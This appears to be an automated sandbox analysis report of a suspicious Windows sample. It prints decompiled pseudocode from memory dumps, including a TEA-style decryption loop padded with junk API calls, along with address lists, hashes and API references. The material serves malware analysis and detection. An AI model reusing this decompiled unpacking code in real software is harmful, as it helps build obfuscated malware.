                  0x00000000
                  0x00000000
                  0x004144f0
                  0x004144cb
                  0x004144cf
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004144cf
                  0x004144aa
                  0x004144ae
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004144ae
                  0x0041440c
                  0x0041440e
                  0x00414425
                  0x0041442d
                  0x0041442f
                  0x00414446
                  0x0041444e
                  0x00414450
                  0x00414467
                  0x0041446f
                  0x00414471
                  0x0041447e
                  0x0041447e
                  0x00000000
                  0x00414471
                  0x0041445d
                  0x00414461
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00414461
                  0x0041443c
                  0x00414440
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00414440
                  0x0041441b
                  0x0041441f
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0041441f
                  0x0041437d
                  0x0041437f
                  0x00414396
                  0x0041439e
                  0x004143a0
                  0x004143b7
                  0x004143bf
                  0x004143c1
                  0x004143d8
                  0x004143e0
                  0x004143e2
                  0x004143ef
                  0x004143ef
                  0x00000000
                  0x004143e2
                  0x004143ce
                  0x004143d2
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004143d2
                  0x004143ad
                  0x004143b1
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004143b1
                  0x0041438c
                  0x00414390
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00414390
                  0x004142ee
                  0x004142f0
                  0x00414307
                  0x0041430f
                  0x00414311
                  0x00414328
                  0x00414330
                  0x00414332
                  0x00414349
                  0x00414351
                  0x00414353
                  0x00414360
                  0x00414360
                  0x00000000
                  0x00414353
                  0x0041433f
                  0x00414343
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00414343
                  0x0041431e
                  0x00414322
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00414322
                  0x004142fd
                  0x00414301
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00414258
                  0x00414258
                  0x0041425b
                  0x0041425f
                  0x00414261
                  0x00414278
                  0x00414278
                  0x0041427c
                  0x00414280
                  0x00414282
                  0x00414299
                  0x00414299
                  0x0041429d
                  0x004142a1
                  0x004142a3
                  0x004142ba
                  0x004142ba
                  0x004142be
                  0x004142c2
                  0x004142c4
                  0x004142ca
                  0x004142cd
                  0x004142d1
                  0x004142d1
                  0x00000000
                  0x004142c4
                  0x004142a9
                  0x004142ac
                  0x004142b0
                  0x004142b4
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004142b4
                  0x00414288
                  0x0041428b
                  0x0041428f
                  0x00414293
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00414293
                  0x00414267
                  0x0041426a
                  0x0041426e
                  0x00414272
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00414272
                  0x00413e75
                  0x00413e75
                  0x00000000

                  Memory Dump Source
                  • Source File: 00000000.00000002.253878180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.253870257.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.253948004.000000000041D000.00000020.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.253956117.0000000000420000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.254006910.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.254029990.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.254035159.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_P2SMn3jloH.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
                  • Instruction ID: 72ab3a9571a0dace12cf911733f11d0778312d0b8b968f66f2a69f79fc5dd33a
                  • Opcode Fuzzy Hash: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
                  • Instruction Fuzzy Hash: 4FC18E73C0AAF34A8736852D40682ABEE626FD179131FC3E29CD43F389D62A5D8195D4
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E00413E7C(void* __eax, void* __ecx) {
                  				void* _t177;
                  				signed int _t178;
                  				void* _t181;
                  				signed char _t187;
                  				signed char _t188;
                  				signed char _t189;
                  				signed char _t191;
                  				signed char _t192;
                  				signed int _t198;
                  				signed int _t284;
                  				void* _t287;
                  				void* _t289;
                  				void* _t291;
                  				void* _t293;
                  				void* _t295;
                  				void* _t297;
                  				void* _t300;
                  				void* _t302;
                  				void* _t304;
                  				void* _t307;
                  				void* _t309;
                  				void* _t311;
                  				void* _t314;
                  				void* _t316;
                  				void* _t318;
                  				void* _t321;
                  				void* _t323;
                  				void* _t325;
                  
                  				_t181 = __ecx;
                  				_t177 = __eax;
                  				if( *((intOrPtr*)(__eax - 0x1c)) ==  *((intOrPtr*)(__ecx - 0x1c))) {
                  					_t284 = 0;
                  					L11:
                  					if(_t284 != 0) {
                  						goto L1;
                  					}
                  					_t187 =  *(_t177 - 0x18);
                  					if(_t187 ==  *(_t181 - 0x18)) {
                  						_t284 = 0;
                  						L22:
                  						if(_t284 != 0) {
                  							goto L1;
                  						}
                  						_t188 =  *(_t177 - 0x14);
                  						if(_t188 ==  *(_t181 - 0x14)) {
                  							_t284 = 0;
                  							L33:
                  							if(_t284 != 0) {
                  								goto L1;
                  							}
                  							_t189 =  *(_t177 - 0x10);
                  							if(_t189 ==  *(_t181 - 0x10)) {
                  								_t284 = 0;
                  								L44:
                  								if(_t284 != 0) {
                  									goto L1;
                  								}
                  								if( *(_t177 - 0xc) ==  *(_t181 - 0xc)) {
                  									_t284 = 0;
                  									L55:
                  									if(_t284 != 0) {
                  										goto L1;
                  									}
                  									_t191 =  *(_t177 - 8);
                  									if(_t191 ==  *(_t181 - 8)) {
                  										_t284 = 0;
                  										L66:
                  										if(_t284 != 0) {
                  											goto L1;
                  										}
                  										_t192 =  *(_t177 - 4);
                  										if(_t192 ==  *(_t181 - 4)) {
                  											_t178 = 0;
                  											L78:
                  											if(_t178 == 0) {
                  												_t178 = 0;
                  											}
                  											L80:
                  											return _t178;
                  										}
                  										_t287 = (_t192 & 0x000000ff) - ( *(_t181 - 4) & 0x000000ff);
                  										if(_t287 == 0) {
                  											L70:
                  											_t289 = ( *(_t177 - 3) & 0x000000ff) - ( *(_t181 - 3) & 0x000000ff);
                  											if(_t289 == 0) {
                  												L72:
                  												_t291 = ( *(_t177 - 2) & 0x000000ff) - ( *(_t181 - 2) & 0x000000ff);
                  												if(_t291 == 0) {
                  													L75:
                  													_t178 = ( *(_t177 - 1) & 0x000000ff) - ( *(_t181 - 1) & 0x000000ff);
                  													if(_t178 != 0) {
                  														_t178 = (0 | _t178 > 0x00000000) + (0 | _t178 > 0x00000000) - 1;
                  													}
                  													goto L78;
                  												}
                  												_t198 = (0 | _t291 > 0x00000000) + (0 | _t291 > 0x00000000) - 1;
                  												if(_t198 == 0) {
                  													goto L75;
                  												}
                  												L74:
                  												_t178 = _t198;
                  												goto L78;
                  											}
                  											_t198 = (0 | _t289 > 0x00000000) + (0 | _t289 > 0x00000000) - 1;
                  											if(_t198 != 0) {
                  												goto L74;
                  											}
                  											goto L72;
                  										}
                  										_t198 = (0 | _t287 > 0x00000000) + (0 | _t287 > 0x00000000) - 1;
                  										if(_t198 != 0) {
                  											goto L74;
                  										}
                  										goto L70;
                  									}
                  									_t293 = (_t191 & 0x000000ff) - ( *(_t181 - 8) & 0x000000ff);
                  									if(_t293 == 0) {
                  										L59:
                  										_t295 = ( *(_t177 - 7) & 0x000000ff) - ( *(_t181 - 7) & 0x000000ff);
                  										if(_t295 == 0) {
                  											L61:
                  											_t297 = ( *(_t177 - 6) & 0x000000ff) - ( *(_t181 - 6) & 0x000000ff);
                  											if(_t297 == 0) {
                  												L63:
                  												_t284 = ( *(_t177 - 5) & 0x000000ff) - ( *(_t181 - 5) & 0x000000ff);
                  												if(_t284 != 0) {
                  													_t284 = (0 | _t284 > 0x00000000) + (0 | _t284 > 0x00000000) - 1;
                  												}
                  												goto L66;
                  											}
                  											_t284 = (0 | _t297 > 0x00000000) + (0 | _t297 > 0x00000000) - 1;
                  											if(_t284 != 0) {
                  												goto L1;
                  											}
                  											goto L63;
                  										}
                  										_t284 = (0 | _t295 > 0x00000000) + (0 | _t295 > 0x00000000) - 1;
                  										if(_t284 != 0) {
                  											goto L1;
                  										}
                  										goto L61;
                  									}
                  									_t284 = (0 | _t293 > 0x00000000) + (0 | _t293 > 0x00000000) - 1;
                  									if(_t284 != 0) {
                  										goto L1;
                  									}
                  									goto L59;
                  								}
                  								_t300 = ( *(_t177 - 0xc) & 0x000000ff) - ( *(_t181 - 0xc) & 0x000000ff);
                  								if(_t300 == 0) {
                  									L48:
                  									_t302 = ( *(_t177 - 0xb) & 0x000000ff) - ( *(_t181 - 0xb) & 0x000000ff);
                  									if(_t302 == 0) {
                  										L50:
                  										_t304 = ( *(_t177 - 0xa) & 0x000000ff) - ( *(_t181 - 0xa) & 0x000000ff);
                  										if(_t304 == 0) {
                  											L52:
                  											_t284 = ( *(_t177 - 9) & 0x000000ff) - ( *(_t181 - 9) & 0x000000ff);
                  											if(_t284 != 0) {
                  												_t284 = (0 | _t284 > 0x00000000) + (0 | _t284 > 0x00000000) - 1;
                  											}
                  											goto L55;
                  										}
                  										_t284 = (0 | _t304 > 0x00000000) + (0 | _t304 > 0x00000000) - 1;
                  										if(_t284 != 0) {
                  											goto L1;
                  										}
                  										goto L52;
                  									}
                  									_t284 = (0 | _t302 > 0x00000000) + (0 | _t302 > 0x00000000) - 1;
                  									if(_t284 != 0) {
                  										goto L1;
                  									}
                  									goto L50;
                  								}
                  								_t284 = (0 | _t300 > 0x00000000) + (0 | _t300 > 0x00000000) - 1;
                  								if(_t284 != 0) {
                  									goto L1;
                  								}
                  								goto L48;
                  							}
                  							_t307 = (_t189 & 0x000000ff) - ( *(_t181 - 0x10) & 0x000000ff);
                  							if(_t307 == 0) {
                  								L37:
                  								_t309 = ( *(_t177 - 0xf) & 0x000000ff) - ( *(_t181 - 0xf) & 0x000000ff);
                  								if(_t309 == 0) {
                  									L39:
                  									_t311 = ( *(_t177 - 0xe) & 0x000000ff) - ( *(_t181 - 0xe) & 0x000000ff);
                  									if(_t311 == 0) {
                  										L41:
                  										_t284 = ( *(_t177 - 0xd) & 0x000000ff) - ( *(_t181 - 0xd) & 0x000000ff);
                  										if(_t284 != 0) {
                  											_t284 = (0 | _t284 > 0x00000000) + (0 | _t284 > 0x00000000) - 1;
                  										}
                  										goto L44;
                  									}
                  									_t284 = (0 | _t311 > 0x00000000) + (0 | _t311 > 0x00000000) - 1;
                  									if(_t284 != 0) {
                  										goto L1;
                  									}
                  									goto L41;
                  								}
                  								_t284 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
                  								if(_t284 != 0) {
                  									goto L1;
                  								}
                  								goto L39;
                  							}
                  							_t284 = (0 | _t307 > 0x00000000) + (0 | _t307 > 0x00000000) - 1;
                  							if(_t284 != 0) {
                  								goto L1;
                  							}
                  							goto L37;
                  						}
                  						_t314 = (_t188 & 0x000000ff) - ( *(_t181 - 0x14) & 0x000000ff);
                  						if(_t314 == 0) {
                  							L26:
                  							_t316 = ( *(_t177 - 0x13) & 0x000000ff) - ( *(_t181 - 0x13) & 0x000000ff);
                  							if(_t316 == 0) {
                  								L28:
                  								_t318 = ( *(_t177 - 0x12) & 0x000000ff) - ( *(_t181 - 0x12) & 0x000000ff);
                  								if(_t318 == 0) {
                  									L30:
                  									_t284 = ( *(_t177 - 0x11) & 0x000000ff) - ( *(_t181 - 0x11) & 0x000000ff);
                  									if(_t284 != 0) {
                  										_t284 = (0 | _t284 > 0x00000000) + (0 | _t284 > 0x00000000) - 1;
                  									}
                  									goto L33;
                  								}
                  								_t284 = (0 | _t318 > 0x00000000) + (0 | _t318 > 0x00000000) - 1;
                  								if(_t284 != 0) {
                  									goto L1;
                  								}
                  								goto L30;
                  							}
                  							_t284 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
                  							if(_t284 != 0) {
                  								goto L1;
                  							}
                  							goto L28;
                  						}
                  						_t284 = (0 | _t314 > 0x00000000) + (0 | _t314 > 0x00000000) - 1;
                  						if(_t284 != 0) {
                  							goto L1;
                  						}
                  						goto L26;
                  					}
                  					_t321 = (_t187 & 0x000000ff) - ( *(_t181 - 0x18) & 0x000000ff);
                  					if(_t321 == 0) {
                  						L15:
                  						_t323 = ( *(_t177 - 0x17) & 0x000000ff) - ( *(_t181 - 0x17) & 0x000000ff);
                  						if(_t323 == 0) {
                  							L17:
                  							_t325 = ( *(_t177 - 0x16) & 0x000000ff) - ( *(_t181 - 0x16) & 0x000000ff);
                  							if(_t325 == 0) {
                  								L19:
                  								_t284 = ( *(_t177 - 0x15) & 0x000000ff) - ( *(_t181 - 0x15) & 0x000000ff);
                  								if(_t284 != 0) {
                  									_t284 = (0 | _t284 > 0x00000000) + (0 | _t284 > 0x00000000) - 1;
                  								}
                  								goto L22;
                  							}
                  							_t284 = (0 | _t325 > 0x00000000) + (0 | _t325 > 0x00000000) - 1;
                  							if(_t284 != 0) {
                  								goto L1;
                  							}
                  							goto L19;
                  						}
                  						_t284 = (0 | _t323 > 0x00000000) + (0 | _t323 > 0x00000000) - 1;
                  						if(_t284 != 0) {
                  							goto L1;
                  						}
                  						goto L17;
                  					}
                  					_t284 = (0 | _t321 > 0x00000000) + (0 | _t321 > 0x00000000) - 1;
                  					if(_t284 != 0) {
                  						goto L1;
                  					}
                  					goto L15;
                  				} else {
                  					__esi = __dl & 0x000000ff;
                  					__edx =  *(__ecx - 0x1c) & 0x000000ff;
                  					__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x1c) & 0x000000ff);
                  					if(__esi == 0) {
                  						L4:
                  						__esi =  *(__eax - 0x1b) & 0x000000ff;
                  						__edx =  *(__ecx - 0x1b) & 0x000000ff;
                  						__esi = ( *(__eax - 0x1b) & 0x000000ff) - ( *(__ecx - 0x1b) & 0x000000ff);
                  						if(__esi == 0) {
                  							L6:
                  							__esi =  *(__eax - 0x1a) & 0x000000ff;
                  							__edx =  *(__ecx - 0x1a) & 0x000000ff;
                  							__esi = ( *(__eax - 0x1a) & 0x000000ff) - ( *(__ecx - 0x1a) & 0x000000ff);
                  							if(__esi == 0) {
                  								L8:
                  								__esi =  *(__eax - 0x19) & 0x000000ff;
                  								__edx =  *(__ecx - 0x19) & 0x000000ff;
                  								__esi = ( *(__eax - 0x19) & 0x000000ff) - ( *(__ecx - 0x19) & 0x000000ff);
                  								if(__esi != 0) {
                  									0 = 0 | __esi > 0x00000000;
                  									__edx = (__esi > 0) + (__esi > 0) - 1;
                  									__esi = (__esi > 0) + (__esi > 0) - 1;
                  								}
                  								goto L11;
                  							}
                  							0 = 0 | __esi > 0x00000000;
                  							__edx = (__esi > 0) + (__esi > 0) - 1;
                  							__esi = __edx;
                  							if(__edx != 0) {
                  								goto L1;
                  							}
                  							goto L8;
                  						}
                  						0 = 0 | __esi > 0x00000000;
                  						__edx = (__esi > 0) + (__esi > 0) - 1;
                  						__esi = __edx;
                  						if(__edx != 0) {
                  							goto L1;
                  						}
                  						goto L6;
                  					}
                  					0 = 0 | __esi > 0x00000000;
                  					__edx = (__esi > 0) + (__esi > 0) - 1;
                  					__esi = __edx;
                  					if(__edx != 0) {
                  						goto L1;
                  					}
                  					goto L4;
                  				}
                  				L1:
                  				_t178 = _t284;
                  				goto L80;
                  			}































                  0x00413e7c
                  0x00413e7c
                  0x00413e82
                  0x00413ef5
                  0x00413ef7
                  0x00413ef9
                  0x00000000
                  0x00000000
                  0x00413eff
                  0x00413f05
                  0x00413f84
                  0x00413f86
                  0x00413f88
                  0x00000000
                  0x00000000
                  0x00413f8e
                  0x00413f94
                  0x00414013
                  0x00414015
                  0x00414017
                  0x00000000
                  0x00000000
                  0x0041401d
                  0x00414023
                  0x004140a2
                  0x004140a4
                  0x004140a6
                  0x00000000
                  0x00000000
                  0x004140b2
                  0x00414132
                  0x00414134
                  0x00414136
                  0x00000000
                  0x00000000
                  0x0041413c
                  0x00414142
                  0x004141c1
                  0x004141c3
                  0x004141c5
                  0x00000000
                  0x00000000
                  0x004141cb
                  0x004141d1
                  0x00414242
                  0x00414244
                  0x00414246
                  0x00414248
                  0x00414248
                  0x0041424a
                  0x00414fa6
                  0x00414fa6
                  0x004141da
                  0x004141dc
                  0x004141ed
                  0x004141f5
                  0x004141f7
                  0x00414208
                  0x00414210
                  0x00414212
                  0x00414227
                  0x0041422f
                  0x00414231
                  0x0041423e
                  0x0041423e
                  0x00000000
                  0x00414231
                  0x0041421b
                  0x00414221
                  0x00000000
                  0x00000000
                  0x00414223
                  0x00414223
                  0x00000000
                  0x00414223
                  0x00414200
                  0x00414206
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00414206
                  0x004141e5
                  0x004141eb
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004141eb
                  0x0041414b
                  0x0041414d
                  0x00414164
                  0x0041416c
                  0x0041416e
                  0x00414185
                  0x0041418d
                  0x0041418f
                  0x004141a6
                  0x004141ae
                  0x004141b0
                  0x004141bd
                  0x004141bd
                  0x00000000
                  0x004141b0
                  0x0041419c
                  0x004141a0
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004141a0
                  0x0041417b
                  0x0041417f
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0041417f
                  0x0041415a
                  0x0041415e
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0041415e
                  0x004140bc
                  0x004140be
                  0x004140d5
                  0x004140dd
                  0x004140df
                  0x004140f6
                  0x004140fe
                  0x00414100
                  0x00414117
                  0x0041411f
                  0x00414121
                  0x0041412e
                  0x0041412e
                  0x00000000
                  0x00414121
                  0x0041410d
                  0x00414111
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00414111
                  0x004140ec
                  0x004140f0
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004140f0
                  0x004140cb
                  0x004140cf
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004140cf
                  0x0041402c
                  0x0041402e
                  0x00414045
                  0x0041404d
                  0x0041404f
                  0x00414066
                  0x0041406e
                  0x00414070
                  0x00414087
                  0x0041408f
                  0x00414091
                  0x0041409e
                  0x0041409e
                  0x00000000
                  0x00414091
                  0x0041407d
                  0x00414081
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00414081
                  0x0041405c
                  0x00414060
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00414060
                  0x0041403b
                  0x0041403f
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0041403f
                  0x00413f9d
                  0x00413f9f
                  0x00413fb6
                  0x00413fbe
                  0x00413fc0
                  0x00413fd7
                  0x00413fdf
                  0x00413fe1
                  0x00413ff8
                  0x00414000
                  0x00414002
                  0x0041400f
                  0x0041400f
                  0x00000000
                  0x00414002
                  0x00413fee
                  0x00413ff2
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00413ff2
                  0x00413fcd
                  0x00413fd1
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00413fd1
                  0x00413fac
                  0x00413fb0
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00413fb0
                  0x00413f0e
                  0x00413f10
                  0x00413f27
                  0x00413f2f
                  0x00413f31
                  0x00413f48
                  0x00413f50
                  0x00413f52
                  0x00413f69
                  0x00413f71
                  0x00413f73
                  0x00413f80
                  0x00413f80
                  0x00000000
                  0x00413f73
                  0x00413f5f
                  0x00413f63
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00413f63
                  0x00413f3e
                  0x00413f42
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00413f42
                  0x00413f1d
                  0x00413f21
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00413e84
                  0x00413e84
                  0x00413e87
                  0x00413e8b
                  0x00413e8d
                  0x00413ea0
                  0x00413ea0
                  0x00413ea4
                  0x00413ea8
                  0x00413eaa
                  0x00413ebd
                  0x00413ebd
                  0x00413ec1
                  0x00413ec5
                  0x00413ec7
                  0x00413eda
                  0x00413eda
                  0x00413ede
                  0x00413ee2
                  0x00413ee4
                  0x00413eea
                  0x00413eed
                  0x00413ef1
                  0x00413ef1
                  0x00000000
                  0x00413ee4
                  0x00413ecd
                  0x00413ed0
                  0x00413ed4
                  0x00413ed8
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00413ed8
                  0x00413eb0
                  0x00413eb3
                  0x00413eb7
                  0x00413ebb
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00413ebb
                  0x00413e93
                  0x00413e96
                  0x00413e9a
                  0x00413e9e
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00413e9e
                  0x00413e75
                  0x00413e75
                  0x00000000

                  Memory Dump Source
                  • Source File: 00000000.00000002.253878180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.253870257.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.253948004.000000000041D000.00000020.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.253956117.0000000000420000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.254006910.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.254029990.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.254035159.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_P2SMn3jloH.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
                  • Instruction ID: 84e9507500bd8bc97996938881ce7e64a8e91b23de40b665da7fa5fc8c57c766
                  • Opcode Fuzzy Hash: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
                  • Instruction Fuzzy Hash: 36C1AF73D0AAF34A8735892D40581ABEE626FD178131FC3E29CD42F389D62A9E8195D4
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000000.00000002.254132135.00000000021B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021B0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_21b0000_P2SMn3jloH.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                  • Instruction ID: 18d234146561140c2e84b24ac3242f29fb8aecdc6f0a47e1c489afb6c809434c
                  • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                  • Instruction Fuzzy Hash: 56115A72380200AFEB54DE65DC90EA773AAEF8C3A0B198165E908CB311D776E841CB60
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 89%
                  			E0040501B(unsigned int _a4, signed int _a8) {
                  				signed int _v8;
                  				signed int _v12;
                  				char _v16;
                  				char _v20;
                  				intOrPtr _v24;
                  				intOrPtr _v28;
                  				intOrPtr _v32;
                  				intOrPtr _v36;
                  				long _v40;
                  				long _v44;
                  				long _v48;
                  				long _v52;
                  				long _v56;
                  				long _v60;
                  				char _v1084;
                  				char _v2108;
                  				char _v3132;
                  				void _v5180;
                  				intOrPtr* _t58;
                  				unsigned int _t75;
                  				unsigned int* _t93;
                  				unsigned int _t94;
                  				unsigned int _t101;
                  				signed int _t104;
                  				signed int _t105;
                  				signed int _t107;
                  
                  				E004084E0(0x1438);
                  				_t93 = _a4;
                  				_t94 =  *_t93;
                  				_v12 = _t93[1];
                  				_t58 = _a8;
                  				_v36 =  *_t58;
                  				_v28 =  *((intOrPtr*)(_t58 + 4));
                  				_a4 = _t94;
                  				_v16 = 0xc6ef3720;
                  				_v32 =  *((intOrPtr*)(_t58 + 8));
                  				_v24 =  *((intOrPtr*)(_t58 + 0xc));
                  				_v20 = 0x20;
                  				while(1) {
                  					_t104 = _t94 << 4;
                  					if( *0x588f80 == 5) {
                  						__imp__GetConsoleAliasExesLengthW();
                  						_t94 = _a4;
                  					}
                  					_t105 = _t104 + _v32;
                  					_t61 = _v16 + _t94;
                  					_a8 = _v16 + _t94;
                  					_v8 = _t94 >> 5;
                  					if( *0x588f80 == 0x1b) {
                  						CopyFileExA("Viwexisohoxopuv jozux", "Hokijifuyoh", 0, 0, 0, 0);
                  						GetTickCount();
                  						InterlockedExchange( &_v40, 0);
                  						LocalSize(0);
                  						_t61 = _a8;
                  					}
                  					_v8 = _v8 + _v24;
                  					 *0x583900 = 0;
                  					E00404FC5(_v24,  &_v8, _t61 ^ _t105);
                  					E00404FA7( &_v12, _v8);
                  					_t107 = _v12 << 4;
                  					if( *0x588f80 == 0x78c) {
                  						GetComputerNameA( &_v1084,  &_v48);
                  						GetVolumeInformationA("vuvugojonofisajihepucejekexuzewoyicuweweyevucaceyu",  &_v2108, 0,  &_v52,  &_v56,  &_v60,  &_v3132, 0);
                  						WriteConsoleW(0,  &_v5180, 0,  &_v44, 0);
                  					}
                  					_a8 = _v12 + _v16;
                  					_t101 = _v12;
                  					 *0x58390c =  *0x58390c | 0xffffffff;
                  					 *0x583908 = 0xff6b3619;
                  					_v8 = _t107 + _v36 ^ (_t101 >> 0x00000005) + _v28 ^ _a8;
                  					_a4 = _a4 - _v8;
                  					E00404F98( &_v16, 0x9e3779b9);
                  					_t51 =  &_v20;
                  					 *_t51 = _v20 - 1;
                  					if( *_t51 == 0) {
                  						break;
                  					}
                  					_t94 = _a4;
                  				}
                  				_t75 = _a4;
                  				 *_t93 = _t75;
                  				_t93[1] = _t101;
                  				return _t75;
                  			}





























                  0x00405023
                  0x00405029
                  0x0040502f
                  0x00405031
                  0x00405034
                  0x00405039
                  0x0040503f
                  0x0040504a
                  0x0040504d
                  0x00405054
                  0x00405057
                  0x0040505a
                  0x00405068
                  0x0040506a
                  0x00405074
                  0x00405076
                  0x0040507c
                  0x0040507c
                  0x00405082
                  0x00405085
                  0x00405091
                  0x00405094
                  0x00405097
                  0x004050a7
                  0x004050ad
                  0x004050b8
                  0x004050bf
                  0x004050c5
                  0x004050c5
                  0x004050cb
                  0x004050d5
                  0x004050db
                  0x004050e7
                  0x004050ef
                  0x004050fc
                  0x00405109
                  0x00405130
                  0x00405144
                  0x00405144
                  0x00405150
                  0x00405153
                  0x00405159
                  0x0040516f
                  0x00405179
                  0x0040517f
                  0x0040518b
                  0x00405190
                  0x00405190
                  0x00405193
                  0x00000000
                  0x00000000
                  0x00405065
                  0x00405065
                  0x00405199
                  0x0040519e
                  0x004051a0
                  0x004051a5

                  APIs
                  • GetConsoleAliasExesLengthW.KERNEL32 ref: 00405076
                  • CopyFileExA.KERNEL32(Viwexisohoxopuv jozux,Hokijifuyoh,00000000,00000000,00000000,00000000), ref: 004050A7
                  • GetTickCount.KERNEL32 ref: 004050AD
                  • InterlockedExchange.KERNEL32(?,00000000), ref: 004050B8
                  • LocalSize.KERNEL32 ref: 004050BF
                  • GetComputerNameA.KERNEL32 ref: 00405109
                  • GetVolumeInformationA.KERNEL32(vuvugojonofisajihepucejekexuzewoyicuweweyevucaceyu,?,00000000,?,?,?,?,00000000), ref: 00405130
                  • WriteConsoleW.KERNEL32(00000000,?,00000000,?,00000000), ref: 00405144
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.253878180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.253870257.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.253948004.000000000041D000.00000020.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.253956117.0000000000420000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.254006910.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.254029990.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.254035159.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_P2SMn3jloH.jbxd
                  Similarity
                  • API ID: Console$AliasComputerCopyCountExchangeExesFileInformationInterlockedLengthLocalNameSizeTickVolumeWrite
                  • String ID: $Hokijifuyoh$Viwexisohoxopuv jozux$vuvugojonofisajihepucejekexuzewoyicuweweyevucaceyu
                  • API String ID: 939497775-455562230
                  • Opcode ID: 1bb6bf6314f06e2873a4e0539b91dd9216eac1220940048cc4abfced84b90cc6
                  • Instruction ID: 84b030e137c9a744ec4aa380a50967c3a34b582b4051fd5b8d58020ad60af0e2
                  • Opcode Fuzzy Hash: 1bb6bf6314f06e2873a4e0539b91dd9216eac1220940048cc4abfced84b90cc6
                  • Instruction Fuzzy Hash: 1A51F676900218EFCB10DF99D9849DEBBB8FF88310B10816AF915F7260D734AA44DFA4
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 89%
                  			E0040501A(void* __edx, unsigned int _a4, signed int _a8) {
                  				signed int _v8;
                  				signed int _v12;
                  				char _v16;
                  				char _v20;
                  				intOrPtr _v24;
                  				intOrPtr _v28;
                  				intOrPtr _v32;
